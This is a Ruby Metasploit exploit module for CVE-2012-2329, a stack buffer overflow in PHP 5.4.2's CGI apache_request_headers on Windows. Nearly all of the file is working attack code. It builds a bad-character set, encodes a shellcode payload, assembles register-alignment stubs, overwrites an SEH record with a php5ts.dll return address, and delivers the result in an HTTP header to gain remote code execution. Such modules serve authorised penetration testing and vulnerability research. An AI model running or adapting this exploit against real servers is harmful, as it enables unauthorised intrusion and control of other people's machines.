jvazquez-r7
149 lines
4.4 KiB
Ruby
149 lines
4.4 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'PHP apache_request_headers Function Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack based buffer overflow in the CGI version of PHP
|
|
5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
|
|
HTTP headers.
|
|
|
|
This module has been tested against the thread safe version of PHP 5.4.2,
|
|
from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Vincent Danen', # Vulnerability discovery
|
|
'juan vazquez', # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2012-2329'],
|
|
[ 'OSVDB', '82215'],
|
|
[ 'BID', '53455'],
|
|
[ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
|
|
[ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
|
|
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Privileged' => true,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 508, # Max length our encoder is able to handle
|
|
'DisableNops' => true,
|
|
'EncoderType' => Msf::Encoder::Type::Raw,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
|
|
{
|
|
'Ret' => 0x1002aa79, # ppr from php5ts.dll
|
|
'Offset' => 1332,
|
|
'Space' => 1321
|
|
}
|
|
],
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'May 08 2012'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
|
|
], self.class)
|
|
|
|
end
|
|
|
|
def exploit
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
# Badchars analysis
|
|
my_badchars = "\x00\x0d\x0a\x5f"
|
|
my_badchars << (0x41..0x5a).to_a.pack("C*")
|
|
my_badchars << "\x80"
|
|
my_badchars << (0x82..0x8c).to_a.pack("C*")
|
|
my_badchars << "\x8e"
|
|
my_badchars << (0x91..0x9c).to_a.pack("C*")
|
|
my_badchars << "\x9e\x9f"
|
|
|
|
# Avoid a length which results in a badchar
|
|
my_payload = ""
|
|
if payload.raw.length > 256 and payload.raw.length < 364
|
|
my_payload << make_nops(364 - payload.raw.length)
|
|
end
|
|
my_payload << payload.raw
|
|
|
|
# Build the SEH handler
|
|
seh = Rex::Exploitation::Seh.new(my_badchars)
|
|
|
|
# Try to encode the payload to avoid badchars
|
|
enc = framework.encoders.create('x86/avoid_underscore_tolower')
|
|
enc.datastore.import_options_from_hash({ 'BufferOffset' => 0x0 })
|
|
my_payload = enc.encode(my_payload, my_badchars, nil, platform)
|
|
|
|
if my_payload.length > target['Space']
|
|
print_error("The encoded payload exceeds the available space")
|
|
return
|
|
end
|
|
|
|
# Make ECX point to the start of the encoded payload
|
|
align_ecx = "pop esi\n" # "\x5e"
|
|
align_ecx << "add esi, -#{target['Offset']+8+5-11}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
|
|
align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
|
|
align_ecx << "add ecx, esi" # "\x01\xf1"
|
|
sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
|
|
# Encoded payload
|
|
sploit << my_payload
|
|
# Padding if needed
|
|
sploit << rand_text(1332-sploit.length, my_badchars)
|
|
# SEH handler overwrite
|
|
sploit << seh.generate_static_seh_record(target.ret)
|
|
# Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
|
|
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
|
|
# Make it crash
|
|
sploit << rand_text(4096 - sploit.length, my_badchars)
|
|
|
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
|
|
|
uri = target_uri.path
|
|
|
|
if target_uri.query and not target_uri.query.empty?
|
|
uri << "?"
|
|
uri << target_uri.query
|
|
end
|
|
|
|
res = send_request_cgi({
|
|
'uri' => uri,
|
|
'method' => 'GET',
|
|
'headers' =>
|
|
{
|
|
"HTTP_X_#{rand_text_alpha_upper(4)}" => sploit,
|
|
}
|
|
})
|
|
|
|
if res and res.code == 500
|
|
print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
|
|
end
|
|
|
|
handler
|
|
end
|
|
end
|
|
|